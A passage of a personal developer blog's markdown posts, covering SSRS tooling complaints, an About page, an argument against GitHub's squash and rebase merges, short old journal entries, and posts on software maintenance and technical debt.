<PaddingTop>2pt</PaddingTop>
<PaddingBottom>2pt</PaddingBottom>
</Style>
</Textbox>
</CellContents>
</TablixCell>
```
1. Report width limited to 455in (even if I'm hiding columns using parameters against the Visibility column filter).
1. NO DYNAMIC COLUMN CREATION (ridiculous!)
1. Selection of multiple columns and setting attributes is ridiculously flaky. This is because I wanted to reduce the column width and font to comply with Point 71 (max report width)!!
1. We have to restart Reporting Server services frequently or our charts won't show up. Eh?
1. Cut and paste columns? Nope!
1. Disappearing "Report Data" menu: [http://stackoverflow.com/a/28883272/10245](http://stackoverflow.com/a/28883272/10245)
1. SSDT for VS2015 upgrades reports to 2016 schema as soon as they're opened (WAT?!) and ignores the TargetServerVersion being set to <=2014 [http://stackoverflow.com/questions/37816216/deploy-of-a-report-with-ssdt-2016-generates-error](http://stackoverflow.com/questions/37816216/deploy-of-a-report-with-ssdt-2016-generates-error) what if we haven't upgraded our production server, hmmm?
1. Okay so when you run a build, VS2015 then **downgrades** the rdl to the right schema to match the project's target server version before putting it in the build folder. What could possssssibly go wrong. 0_o Complexity++
1. Install SSRS in only 41 easy steps [https://thecodeattic.wordpress.com/category/ssrs/](https://thecodeattic.wordpress.com/category/ssrs/)
1. Build > "Skipping 'SomeReport.rdl'. Item is up to date." - No it isn't, I've deleted it from the friggin bin folder. So clearly it has some stupid cache of what's it thinks is on disk rather than, oh I don't know fucking checking the disk. Sheesh. If it's that optimized why is everything still so damn slow?!
1. Building a project with lots of reports is slow. Even if nothing changed.
1. Intermittently get _"[rsInvalidReportDefinition] The definition of this report is not valid or supported by this version of Reporting Services. The report definition may have been created with a later version of Reporting Services, or contain content that is not well-formed or not valid based on Reporting Services schemas. Details: Data at the root level is invalid."_ - I am not alone. [https://connect.microsoft.com/SQLServer/feedback/details/2988044/randomly-get-rsinvalidreportdefinition-when-previewing-report](https://connect.microsoft.com/SQLServer/feedback/details/2988044/randomly-get-rsinvalidreportdefinition-when-previewing-report) - A rebuild fixes it for me, for a while at least.
1. Sometimes when you edit an embedded dataset it completely fails to persist any of your changes to disk. And when you close the report they are lost. Handy. Thanks fuck for git.
1. Assumes you've never heard of source control and creates numbered backups of report files (notably on auto-upgrade). Also has messages like "_delete will permanently delete this thing_" - no it won't I have source control; I wonder if the SSRS know what that is.
1. I've never managed to crash VS2015 so many times in one day. Omg you didn't click there did you? I wasn't ready! *crash* ... *again*
1. Change the files on disk and the preview window often doesn't notice
1. Preview window silently fires a 'build' of the reports. Sometimes.
1. Generates broken Shared-datasets [http://stackoverflow.com/a/38753141/10245](http://stackoverflow.com/a/38753141/10245)
1. If you break the xml of a shared-dataset the _entire project_ will fail to load. w-t-f.
1. Renaming datasets etc just breaks everything rather than updating references.
1. The `.rptproj` file has a `<state>` tag at the top which is base64 encoded xml (WAT?! xml in xml. eerrrrr), which is information about source control (_arse-about-face or what! source code that controls the *source-control* [that controls the source, that controls the source-control that controls the source...]; even the words are circular!!_). In the base64 you'll find a `<SourceControlInfo>` tag.
```xml
<Project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ToolsVersion="2.0">
<State>$base64$PFNvdXJjZUNvbnRyb2xJbmZvIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY<KEY>State>
...
```
decoded "state" contents:
```xml
<SourceControlInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/engine/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/engine/2/2" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/engine/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/engine/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/engine/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/engine/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/engine/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/engine/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/engine/400/400" xmlns:ddl500="http://schemas.microsoft.com/analysisservices/2013/engine/500" xmlns:ddl500_500="http://schemas.microsoft.com/analysisservices/2013/engine/500/500" xmlns:dwd="http://schemas.microsoft.com/DataWarehouse/Designer/1.0">
<Enabled>true</Enabled>
<ProjectName>SAK</ProjectName>
<AuxPath>SAK</AuxPath>
<LocalPath>SAK</LocalPath>
<Provider>SAK</Provider>
</SourceControlInfo>
```
Enough xml namespaces for you?
1. The state base64 changes all the time causing diff noise.
I know I can't count, but if ssrs is going to make so little effort I don't see why I should. And to be honest "100" seemed a lot more like comic exaggeration when I titled my tomboy note which only had 5 or 6 grumblings in it, I wasn't actually expecting to get within spitting distance of the original number!
Doesn't mean I won't use it again mind, just don't promise to like it.
If you liked this, you might also like the ssrs deployment tool I sometimes look after: [https://github.com/timabell/ssrs-powershell-deploy](https://github.com/timabell/ssrs-powershell-deploy) (mostly not my work, just pulled together a bunch of contributions).
<file_sep>---
layout: page
title: About
permalink: /about/
---
Hi, I'm <NAME> (one of many, but not the
[actor](https://www.imdb.com/name/nm0008543/) or the [other software
dev](https://twitter.com/timabell)).
* I build software.
* I like helping our government do [better digital things](https://www.gov.uk/service-manual/technology).
* I like building things in smart, agile teams who don't take any shit and get
things done.
* I also like working solo.
* I created [SQL Schema Explorer](https://timabell.github.io/schema-explorer/) and
[ef-enum-to-lookup nuget package](https://www.nuget.org/packages/ef-enum-to-lookup).
* I'm learning to be an [entrepreneur](https://www.startupsfortherestofus.com/).
## More stuff in my world
* [Books I've been reading (goodreads)](https://www.goodreads.com/review/list/50628592?shelf=read)
* I love podcasts and audiobooks, here's [my podcast subscriptions](https://timwise.co.uk/podcast-subscriptions.html).
* [Random public code and forks on github](https://github.com/timabell/)
* [Even more random gists](https://gist.github.com/timabell/)
* If we're besties you can [find me on telegram](https://t.me/tim_abell) or Signal but definitely not WhatsApp because facebook has enough data already.
<file_sep>---
title: GitHub rebase and squash considered harmful
layout: post
---
Not to be confused with `git rebase` and the ability to squash commits locally with interactive rebase, which is [a whole other flamewar](/2019/10/14/merge-vs-rebase/).

This post is predicated on giving a crap about the git history you and your team produce. If you don't care about good quality git history then you are wrong because [git history is an important aspect of your engineering output](https://timwise.co.uk/2016/03/18/yet-another-good-commit-messages-post/).
In short, "squash and merge" is never good, "rebase and merge" is almost never good, "create a merge commit" is a good default, ... and if you have a really great team then mainlining while pairing/mobbing can be great for mean-time-to-recovery but shouldn't be the only allowed way.
If you don't believe me yet, then let us now go reaaaally deep on all the details of all the ways you can do this and what makes them so good/bad/evil:
## "Rebase/Squash and merge" - both bad
Personally I dislike the "**rebase**" and "**squash**" buttons on GitHub because:
* You don't find out what you actually put in `main` until after it's done. If you don't believe me check the sha1 of the tip of your PR branch with the new tip of `main`, your sha1 is nowhere to be seen. Github then has the gall to sign the commits as you if you've let it.
* There is no record of which commit you based your branch on, so if there's a new incompatibility because `main` has moved on there is no record of what commit your branch was based on to assist with figuring out where the problem was introduced, it just looks like a bad patch to main with a PR that could never have worked.
* The generated commits lose the true commit metadata generated locally (authorship, timestamps, sha-1).
* GitHub generates brand new commit(s) at the point of applying to `main` with no chance to review first.
These two options behave in ways that are not immediately obvious (to be fair github improved the labels on the options after I first ranted about this, but it doesn't change the fundamental issues). And if you press one of them without realising what it's going to do, tough because it's already in `main`, and if you have branch protection on (you probably should) then you can't even undo it; it's there foreeeeeeeever.
Someone reviewing your PR has no idea which of these three buttons you will push, which could have been the difference between approving (based on a tidy merge and nice branch history) and rejecting a PR (based on including junk history or a badly worded squash commit).
Let's dive in to the hell that github have created for us:
### "Squash and merge" - pure evil
This one takes all your carefully crafted commits (or [pile of "wip" junk](https://xkcd.com/1296/) if you are lazy or plan to squash) and combines them into a single commit, pausing to allow you to write a better commit message (which few people I've worked with bother to actually do, immortalizing "* wip" in the history forever) and then pushing it to `main` without further opportunity to review what you are shipping.
The behaviour this option encourages, nay, mandates, is to create gigantic 100-file patches that make your eyes bleed to read, basically making `git blame` useless beyond knowing who to hate.
Anyone who tries to create many small meaningful and logically coherent patches but who has to use this option has the faustian bargain of choosing between making their team review piles of small PRs (too much overhead) or generating one stinking commit in `main` with all carefully crafted iterations lost to oblivion (for example commit 1: refactor everything, commit 2: make important one-line business change, commit to main: both at once, argh).
Note that github alters your original commit message to retro-fit PR numbers. Also evil.
If you make a change to a file that results in both renaming and modifying files such as a rename-refactor, you can make that easier to follow by doing it in two commits... unless you squash them together. This is exacerbated by [git's rename detection](https://stackoverflow.com/questions/7938582/how-does-git-detect-similar-files-for-its-rename-detection) which is actually not stored at all, but instead done as a heuristic when viewing patches. If you split the file name change and contents change into two patches you can help a future reader follow what you did, but if you change a file too much and then squash it all together then git will treat it as add and delete, breaking the ability to follow a line of code back through history without even more detective work and guessing.
I have nothing good to say about the "Squash and merge" option. If you don't want to see the messy branches of your developers **then use `--first-parent`**. This option in github solves a non-problem and just makes everything worse. Anyone who thinks this option has any merit is wrong.
If an individual developer wants to create a single squashed commit for `main` **they should squash locally and PR that**. This option adds precisely nothing to what is possible, encourages reviewing and shipping junk history and encourages bad behaviour and unreadable patches. If you think it annoys me you're right, it should never have been created. It enables shit developers to carry on being shit and generate less "noise" in the history. Why would you want a process that only exists to take the edge off being around the worst developers?
### "Rebase and merge" - 99% awful
This option takes your commits, rebases them on `main` and then fast-forwards main to the new top commit.
When this option has been used you can no longer tell by looking at the git history that there was ever a PR, which is actually useful context when looking back to work out why the hell something is how it is. (If you look at the commits in github it does magically show the PR number but you can't find that context any other way.)
This option is marginally less offensive to me if used judiciously by skilled teams. You might sensibly use it because your PR was only for peer review rather than because your commits deserve a logical grouping. If you can trust your team to intelligently decide when the commits in a PR would look nice as straight-line history in `main` then perhaps leave this option available.
If you want your github workflow fool-proof and "scalable" then disable this option. Noobs will find this button and push it for the wrong reasons and give you a shit git history.
The upside of being clever occasionally is outweighed in my experience by the beautiful consistency of everything coming in as "merge PR NNN for feature YYY" and then being able to either ignore the details of the branch with `--first-parent` (which you can't do if someone has used this button), or look at the commits in that PR as a logical group on the second-parent side when you need more granularity (easily done by running a first-parent log on the last commit of the branch before it was merged).
## "Create a merge commit" aka "github flow" - good
My preferred workflow is to use the normal "merge" button every time. This is sometimes known as "[GitHub Flow](https://guides.github.com/introduction/flow/)".
In my view you should generate your commits, sha-1 and all, exactly as they will be merged into `main`, and then as a separate merge commit those should be combined into `main`.
To avoid many "tramlines" do local rebases to avoid PR branches being based on very outdated `main`.
* This retains the commit exactly as you crafted it locally.
* It calls out the difference between you writing your commit and deciding it can go into `main`.
* It retains the information about which commit you based your branch on.
There's something to be said for being able to do a `git log --first-parent origin/main` and get a consistent list of merged PR branches. It's really quite readable compared to a mishmash of the different styles of merge to `main`.
You can configure GitHub to disallow the other options if your team are on-board with the idea.
You could argue that single commit PRs are a lot of overhead for something trivial, but equally having to decide each time results in more time worrying about whether something justifies the special treatment of ending up directly on main (in GitHub's modified form), and getting it wrong sometimes.
If your PR branches are full of "wip", "fix tests" and other junk then the answer is not to throw this option out, the answer is to **get better at creating good patch sets** by learning to use `git rebase --interactive` and thinking harder about what would make a good patch before you start typing in your IDE. (And noticing when your patch is getting messy and stopping to reflect on good patch generation).
I'm aware there are counter-arguments, but in my experience on many teams this seems to end up being the cleanest balance of trade-offs. If you are an individual developer on your own project then pure mainline development can make more sense, though even then thinking of feature branches and having them explicitly merged where appropriate can neatly group related commits. The only compelling argument I've heard against this flow is mean-time-to-fix, but that doesn't mean you have to kill this approach entirely, just be able to use other approaches too.
## But my interface can't do first-parent!
Someone once complained at me that we shouldn't do merge commits because they make no sense when viewed in github's deficient history viewer, which shows a random mishmash of mainline and branch commits with no indication of which is which.
Seriously, use a better git viewer, there are literally thousands.
It 100% sucks that github, the flagship platform for git, still to this day does not have a proper branch view let alone first-parent view. Appalling. I'm even more horrified that [GitHub desktop](https://github.com/desktop/desktop/issues/1634) has inherited this idiotic denial of branch based views. If the view of history / PRs in github doesn't show you what you need **don't use it**. Did you know you can review PRs by just pulling down the branch and looking at it locally? You are a capable programmer who uses many tools not an idiot that needs to be spoonfed powerpoint presentations.
Even visual studio can show you branches, merges and first-parent views, it's just a little tricky to find because they insisted on calling everything by different names and using mystery-meat buttons.
Sorry, but I don't have much sympathy with the "my tool is shit so we should do a worse job" complaint against doing things properly, it's weak.
## The case against PRs
The only team I have ever come across that (incorrectly) disabled the "create a merge commit" option did so (I believe) in the name of "mean-time-to-recovery". This is however a false dichotomy.
If you want fast "mean time to recovery" (MTTR) you need to be able to ship a patch to `main` and on to production fast. There is nothing about the *ability* to create merge commits or use PRs that prevents that. So long as you don't enable the "require a PR" option in github, there's nothing to stop a team pushing straight to `main` when that's the right thing to do.
I like the idea that the requirement is not a pull request, but just two pairs of eyes on everything. That gives you the ability to be more responsive as pairs can now ship straight to production. That said, I just don't buy the idea of "mainline development" for every patch. Some changes are just more complicated than a single patch and it's good to be able to break things down in a branch before merging. Don't get me wrong, I'm all for pulling groundwork out and mainlining it (if your dev team is good enough to do this) so that your final patch is smaller, but sometimes a feature change has to go in in one commit to `main`, and without a branch plus a merge commit to main it is just not granular enough to make a useful history. And no, feature flags will not fix this for you, they are a useful thing for sure, and can reduce the size of unmerged branches, but sometimes you just have to change fundamental things that can't be "flagged".
Team culture is worth considering, regardless of tool configuration. If your team does everything by PR then when something is on fire they'll probably raise a PR and then sit around waiting for approval; and if your team always commits everything to main as they go they'll recover fast but their history will be full of mis-steps and fixups that could have been dealt with before they ever hit main. As always extremes are bad and anyone who fast-talks you into believing one extreme is a panacea is glossing over important nuance and interesting counter-examples.
Disabling merge commits doesn't prevent people from having slow PR based async processes, and equally, enabling merge commits and PRs doesn't stop you shipping a quick patch by pushing straight to main when something's on fire. The two things are orthogonal.
## Perfection?
So what's the ideal? In my view it's one of the following depending on the quality of your team and what your goals are:
### High performing team with top-end developers - reducing mean-time-to-fix
* Two pairs of eyes rule.
* Don't disable anything, just educate and trust
* (... apart from branch protection to avoid force-push to main because forward-only is good)
* (...... and you can probably tell I wouldn't mind if you did disable squash and perhaps rebase given the above ranting).
* Use judgement for when to pair, mainline, PR etc.
* Practice all approaches so that team is used to fast fixes.
Trust your team to use the right tool in the right moment. Big hairy feature? Break it down, use PRs if useful, ship as a merge commit with nice history and link to story and PR. Production on fire? Pair/mob and mainline that sucker.
### Mediocre / mixed team, avoiding breakages over fast-fix
* Require PR for all changes.
* Disable everything but "create merge commit".
* Review PRs for quality of commit list and require rewriting branch history till it's up to team standards before merging.
<file_sep>---
title: "Own a domain? Then Fear the \"Joe Job\""
date: 2004-04-08
slashdot_url: https://slashdot.org/journal/67777/own-a-domain-then-fear-the-joe-job
---
<p>Just read <a href="http://www.sitepoint.com/article/sabotage-coping-joe-job">this</a> article on <a href="http://www.sitepoint.com/">sitepoint</a> whilst looking into php mysql.<br>I received the fear.</p>
<p>--</p>
<p>Synopsis:<br>You upset someone, they send thousands of emails to your customers and anyone else with an email address, using your email address.<br>You drown under the response, taking your business with you.<br>This article is the survival tactics.</p>
<file_sep>---
title: "no patents on software!!"
date: 2005-07-06
slashdot_url: https://slashdot.org/journal/111220/no-patents-on-software
---
<p>Woo!<br><a href="http://news.bbc.co.uk/1/hi/technology/4655955.stm">http://news.bbc.co.uk/1/hi/technology/4655955.stm</a></p>
<p>see also<br><a href="http://ffii.org/">http://ffii.org/</a><br><a href="http://www.eff.org/">http://www.eff.org/</a></p>
<file_sep>---
title: "corolla"
date: 2005-07-27
slashdot_url: https://slashdot.org/journal/113005/corolla
---
<p>bit sad, but i've joined the <a href="http://toyotaownersclub.com/">toyota owner's club</a> website</p>
<p>here's some of my posts:<br><a href="http://toyotaownersclub.com/forums/index.php?showtopic=38971&st=0&p=395831">http://toyotaownersclub.com/forums/index.php?showtopic=38971&st=0&p=395831</a></p>
<file_sep>---
title: "You, yes you, reading my /. journal"
date: 2004-01-29
slashdot_url: https://slashdot.org/journal/60097/you-yes-you-reading-my--journal
---
<p>Drop me a line, any line. I want to know who reads this. You could add a comment if you don't mind everyone else seeing.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: Maintaining software - a bare minimum
layout: post
---
All the press goes to new features, but there's a lot that has to happen just to stand still in software development.
None of the following results in "shiny new feature that everyone is excited about". It's the ongoing work that anyone who's not in day-to-day software development might not appreciate, sometimes questioning where the time is going.
Here's a catalog of things that eat engineering time, but that are eventually unavoidable if you don't want to grind to a halt under a mountain of [tech debt](/2020/07/09/approaches-to-refactoring-and-technical-debt/):
## Non-feature work
### 1) Bugs
Customers (or your monitoring) notice something that's not working:
- Investigate and ship a fix,
- or worse, spend time investigating only to discover it can't / won't be changed or fixed.
### 2) Minor dependency upgrades
e.g. upgrading [xUnit](https://www.nuget.org/packages/xunit) from `v2.4.0` to `v2.4.2`
These are usually trivial if your tests are good and the authors respect [Semantic Versioning](https://semver.org/). They still need to be done regularly to keep the impact small.
### 3) Major dependency upgrades
e.g. [upgrading MediatR from v9.x to v10.0.0](https://github.com/jbogard/MediatR/wiki/Migration-Guide-9.x-to-10.0)
> "This release includes the following breaking changes in the API ..."
> ~ MediatR release notes
### 4) Platform upgrades
e.g.
- [Upgrading Rails from 5.2 to 6.0](https://www.fastruby.io/blog/rails/upgrades/upgrade-rails-from-5-2-to-6-0.html)
- [Migrating apps from Azure Functions version 3.x to version 4.x](https://learn.microsoft.com/en-us/azure/azure-functions/migrate-version-3-version-4?tabs=net6-in-proc%2Cazure-cli%2Clinux&pivots=programming-language-csharp)
There are often significant changes, including removing and changing (sometimes called "breaking" or "breaking changes") things that your code relies on.
You might be tempted to put these off. Don't. The longer you leave it, the worse your problem becomes, eventually becoming insurmountable.
### 5) Fundamental shifts
Sometimes there's an enormous shift in technology, e.g.
- On-premise compute to cloud compute.
- Desktop to mobile.
- Server-rendered web to API + Single Page Applications (SPAs).
- More recently, the shift from servers to serverless.
- Data storage (SQL vs NoSql, vs Graph databases).
- New hosting and technology platforms.
If you don't keep up to date then you find it increasingly hard to operate what you have (no engineers want to work with the old tech, the online world no longer supports you with information and tooling, etc). And your customers' expectations start to demand things that your outdated approaches are just unable to support.
Have a plan for regularly considering these and taking action. You might spin up new teams to try them out, or give people "Friday time" to explore new things. The only thing you mustn't do is "nothing".
## Why is keeping on top of upgrades important?
Why not just ignore the upgrades till you need them?
Two reasons:
- Security fixes
- The longer you let it pile up, the harder it gets (exponentially so).
## Keeping changes small
If you allow upgrades to pile up for a month or so, you'll have one big patch that upgrades many things. If something breaks (even with good test coverage) it can be a lengthy process to figure out which upgrade broke it and what to do about it.
If you do this regularly (weekly at least), then you'll only be upgrading a few minor versions at a time, and it will be immediately obvious where to start looking if something breaks (i.e. roll back, then upgrade the 5 dependencies one at a time, and look at the changelog of the one that breaks it.)
## Test coverage
Upgrades are a key reason that good test coverage (at the functionality level) is very important. Without this you will have a significant manual testing effort for every upgrade. Relying on manual testing results in avoiding upgrades for longer, and breakages making it to production unnoticed.
## Monitoring
Good exception monitoring and telemetry in production will improve your ability to catch any oddities that slip through your test coverage.
<file_sep>---
title: "Ian & broadband"
date: 2006-05-23
slashdot_url: https://slashdot.org/journal/136058/ian-broadband
---
<p>Ian was <a href="http://www.pure-virtual.org/ian/PermaLink.aspx?guid=941da462-0038-44ee-99e8-fc2253e7a4c0">here</a> (old news).<br>Found that page <a href="http://www.google.co.uk/search?hl=en&q=site%3A+timwise.co.uk&btnG=Search&meta=">here</a></p>
<p>New broadband connection up on timwise.dyndns.org (no website yet).<br>Nice bt engineer, who called 10 mins before showing up. Handy.</p>
<file_sep>---
title: "taff tour"
date: 2004-07-24
slashdot_url: https://slashdot.org/journal/78327/taff-tour
---
<p>the <a href="http://www.t.abell.dsl.pipex.com/photos/wales_20040715/">pics </a>are up.</p>
<file_sep>---
title: Approaches to refactoring, technical debt and legacy code
layout: post
---
Sometimes a codebase has an overwhelming amount of "terrible" stuff that as a developer you almost can't help but just dive in and fix it. Doing this without thinking too hard can result in many variations of failure, such as:
* Upsetting the people paying you because you are doing something they don't consider important.
* Never finishing the mammoth rewrite you took on, resulting in a mess of two different styles of code.
* Personal burnout.
* Fixing things that maybe weren't actually that important (even if they make you cry whenever you have to look at their source code), at the expense of failing to fix more urgent problems or building useful features.
---
⏩ If you want the executive summary, head over to my [Leaders guide to technical debt - aka "why can't we ship anything!?"](https://charmconsulting.co.uk/2020/11/27/leaders-guide-to-technical-debt/) 🧐. For the technical details read on below.

## Must-read articles
Here's a couple of must-read articles on the subject:
### Refactoring
> "We take the next feature that we are asked to build, and instead of detouring around all the weeds and bushes, we take the time to clear a path through some of them."
>
> ~ <NAME>
In short, don't make debt cleanup its own task, just tackle what gets in your way as you go, and leave the camp tidier than you found it.
I recommend reading the whole article here: [Refactoring -- Not on the backlog! by <NAME>](https://ronjeffries.com/xprog/articles/refactoring-not-on-the-backlog/), it's not too long.
### Technical Debt
> "Tech debt": an overloaded term. There are at least 5 distinct things we mean [when] we say “technical debt”.
>
> 1. Maintenance work
> 2. Features of the codebase that resist change
> 3. Operability choices that resist change
> 4. Code choices that suck the will to live
> 5. Dependencies that resist upgrading
Read the full explanation of each type of debt here: [Towards an understanding of technical debt by <NAME>](http://laughingmeme.org/2016/01/10/towards-an-understanding-of-technical-debt/), a bit longer but an important piece of writing.
## Huge piles of debt
If your project is sooo "bad" that you feel like throwing it out, you might do well to heed this quote:
> "There is only one way to eat an elephant: a bite at a time."
>
> ~ [<NAME> (via Psychology today of all places!)](https://www.psychologytoday.com/us/blog/mindfully-present-fully-alive/201804/the-only-way-eat-elephant)
Which to me means iterate your way to good.
It doesn't mean have no plan, in fact you should know where you are trying to get to and how realistic that is so you don't end up with a rewrite that can never be completed because it was too ambitious.
## Even more reading
### Is a mess a debt?
> "A mess is not a technical debt. A mess is just a mess."
>
> ~ Uncle Bob
[A Mess is not a Technical Debt by Uncle Bob](https://sites.google.com/site/unclebobconsultingllc/a-mess-is-not-a-technical-debt) suggests that the use of the term debt is for a considered short term trade-off just like taking out a loan, but a mess is nothing of the sort as there is no up-side to creating a mess versus having a clean but temporary solution to a problem.
### More taxonomy of bad code: the Reckless/Prudent vs Deliberate/Inadvertent quadrant
<NAME> shows that you can categorize debt by whether it is reckless or prudent, and separately whether it was deliberately or inadvertently added to the code.
> "Technical Debt is a metaphor, so the real question is whether or not the debt metaphor is helpful about thinking about how to deal with design problems, and how to communicate that thinking. A particular benefit of the debt metaphor is that it's very handy for communicating to non-technical people."
>
> "The useful distinction isn't between debt or non-debt, but between prudent and reckless debt ... there's also a difference between deliberate and inadvertent debt."
>
> "The decision of paying the interest versus paying down the principal still applies, so the metaphor is still helpful for this case."
>
> ~ [The Technical Debt Quadrant by <NAME>ler](https://martinfowler.com/bliki/TechnicalDebtQuadrant.html)
These are useful definitions that can help clearly communicate complex issues with the code to people not directly involved in the code.
It's well worth reading much more of Martin Fowler's writing. There's so much to learn from Martin about programming good practice; the articles are all written in a very human and accessible style.
### Legacy tests
Now that TDD is widely adopted we're faced with cleaning up the output of those who [cargo-culted](https://en.wikipedia.org/wiki/Cargo_cult_programming) test coverage, or had well meaning but ultimately badly formed attempts at adding tests to their code, sometimes with prodigious volumes of test code.
I think "Legacy tests" is a useful term to describe these problematic tests. Nat Pryce outlines some useful hints that you have legacy tests on your hands:
> "Symptoms of legacy tests I have encountered include:
> ...
> Tests are named after issue identifiers in the company's issue tracker.
> Bonus points if the issue tracker no longer exists."
>
> ~ Nat Pryce, [Working Effectively with Legacy Tests](http://natpryce.com/articles/000813.html)
## The audio version from Codurance
[Codurance](https://codurance.com/) hosted an insightful round-table podcast episode with a group of people who are clearly very experienced. You can listen here: <https://codurance.com/podcasts/2019-01-21-legacy-code/> and will doubtless be inspired by some things in there. The conversation takes a little while to build momentum but it's worth the wait.
Here some highlights of what I learnt from listening to the show:
### The Feathers Book
* [Working Effectively with Legacy Code by <NAME>](https://www.amazon.co.uk/Working-Effectively-Legacy-Michael-Feathers/dp/0131177052/) is *the* book to read on the subject.
Feathers defines legacy code as code without tests.
> "Preserving behaviour is a large challenge. When we need to make changes and preserve behaviour, it can involve considerable risk."
>
> ~ <NAME>
This book is heavily geared towards unpicking the difficulties in getting untested code under test in object-oriented static typed languages such as Java, C# and C++, and modifying it safely.
It is a detailed and thorough treatment of all the tactics available to bring untested object-oriented code under test, specifically sprawling and smelly classes and methods. It won't help you with larger scale problems such as poor structuring of microservice architecture, message bus systems etc.
This [article summarizing the Feathers' Legacy Code book](https://understandlegacycode.com/blog/key-points-of-working-effectively-with-legacy-code/) has some of the tactics detailed and gives a good flavour of the book so you can decide whether to dive deeper.
### Named techniques and related libraries
* [Characterization testing](https://michaelfeathers.silvrback.com/characterization-testing) is the idea of creating tests to probe and demonstrate the existing behaviour of previously untested code.
* Related to this is "approval tests" which allow you to easily incorporate snapshots of output (json, xml, logs etc) into your tests in order to capture existing behaviour and be able to spot any variations that pop up during refactoring.
* [ApprovalTests.net](https://github.com/approvals/ApprovalTests.Net) is a dotnet library for implementing approval tests.
* Introducing [seams](http://wiki.c2.com/?SoftwareSeam) into software can be a useful technique for breaking down untestable monoliths into testable chunks on the way to better code.
* [Mutation testing (wikipedia)](https://en.wikipedia.org/wiki/Mutation_testing) (more info on [mutation testing at csharp academy](http://csharp.academy/mutation-testing/)) is a useful way of checking how good your test coverage really is. It is the idea of making (almost) random changes to the code under test to see whether your tests spot the change in behaviour.
* For dotnet this can be done with [Stryker.net](https://github.com/stryker-mutator/stryker-net)
### Approaches from hard-won experience
* Make as few changes as possible to get untested production code under test. The first cut of tests will likely be fragile.
* It's more important that legacy code that is already in production continues to behave as it currently does than that it behaves as originally specified. People and downstream systems may now rely on that "incorrect" behaviour.
* Does the organisation (culture, systems, pressures etc.) cause bad code to be created? If you don't fix that then you will always get more "legacy" code.
* The importance of competent technical leadership within an organisation for preventing the build up of catastrophic levels of technical debt.
* When communicating, quantify the cost of problems with the legacy code. E.g. "you are losing 1 in 5 developer-days to coping with bugs introduced due to the lack of automated regression tests".
* Have the hard conversations with the business about the cost of fixing the mess.
* Doing a rewrite is (almost) always the wrong answer.
* Get small wins, even if you are facing a huge challenge.
## Maybe modelling is the problem
Something that looks like bad code could be that way because of a failure to properly model the real world.
Domain Driven Design (DDD) has much to teach on the matter, and this is a great video on the why modelling could be the problem:
[Technical debt isn't technical - <NAME>øst - DDD Europe 2019 - YouTube](https://youtu.be/d2Ddo8OV7ig)
## Small Batches Automated Testing Podcast Episode
Podcast episode [Software Delivery in Small Batches: Automated Testing with <NAME>](https://share.transistor.fm/s/a5ca21cb) talks about practical approaches to legacy code, including the idea that you actually can't always avoid writing some more untested code because of the cost-benefit trade-off.
> "You can’t just slap a test on any change that you make because the underlying functionality might be really complex"
The episode describes the evolution of our industry in learning the importance of test coverage for avoiding known risks in software development, and declares that you cannot truly call yourself a professional developer if you are not writing tests.
> "I always recommend starting with the easiest most trivial stuff, adding some tests in those areas and then working up to the bigger areas"
Some relevant thoughts from the episode:
* Good test coverage is a pre-requisite to any higher-level automation such as continuous-deployment. (1:35)
* To add tests to a project that has no coverage you have to retrofit test tooling and infrastructure (CI, data management etc). "That can be very non-trivial, even for someone very experienced, ... it's going to be a huge challenge to add that stuff retroactively." (3:10)
* With regards to the idea of "Declaring that we are going to write tests for every PR from now on." (7:10)
* "You can't just slap a test on any change that you make because the underlying functionality might be really complex. In order to write a test you might have to have certain setup data to create the state required for that test might be extremely complicated. To expect somebody to include a test with every PR is not realistic. For some features your change might be 10 minutes of work but to get the test setup, that might be weeks of work in order to take the 20-minutes to write the test."
* "I always recommend starting with the easiest most trivial stuff, adding some tests in those areas and then working up to the bigger areas. It seems that you should start with the most important stuff but that's not realistic because the most important stuff is also the hardest to test."
* A useful step might be to just get tests in place on your own machine without worrying about CI initially (they were talking about training a developer, but it's a useful thought for being efficient tackling legacy projects) (9:30)
* "Having high quality code is almost impossible without good test coverage. Test coverage enables refactoring. If you can't refactor your code it's really hard to keep it in good shape." (17:15)
* As you flush out bugs by adding more and more coverage: "The type of issues you find over time, the complexity goes up, because they're not really related to the interplay of something known, they're usually related to more and more complications; instead of just one unit of code interacting... [it's] 5 or 10 or 200; these larger components and permutations that you never considered in the first place, because some customer hit it for the first time." Moments where you go "woah I never even knew that was possible" (25:50)
* "It all comes down to managing risk, risk of the software in question being correct" (30:20)
* "There's a risk of producing incorrect software, but there's also a risk to the business that the engineers will not be able to keep pace with the business if they have to spend so much extra time just verifying the software, there's a mistake in thinking that writing tests takes more time, the reality is that if you have automated tests then you will be able to work much faster than if you didn't"
* On a project that had tests once - "...at some point tests had stopped passing", should you "blow them away or fix them?". (32:22)
* For an "application that's been developed for two years with no tests with this big team and they don't have the skills; that's going to be a big up front investment, it's going to be a year or two before [adding test coverage] starts to pay off."
* "... at some point tests had stopped passing and they were never updated - okay do I trust these or not? If they're not passing, do I blow them away or fix them." - In this case blew them away and spent three months writing tests such that he could build new features. "Even now [the project has] low test coverage. This has been a multi-year effort."
* "This is one of the real problems when it comes to testing, is that if for some reason the people who start the project don't do testing, and the project is successful enough to go on for X number of years without it, then the effort required to add testing after the fact is an order of magnitude greater than it would have been at the beginning." ... "the can gets kicked down the road."
* "Frustrated by the attitude of 'let's not spend time making this code high quality because what if this startup fails' but what if this startup succeeds? Yes it may be possible you only survive by cutting corners but not convinced, think it might be a delusion."
* "The only way to go fast is to go well." ~ <NAME>
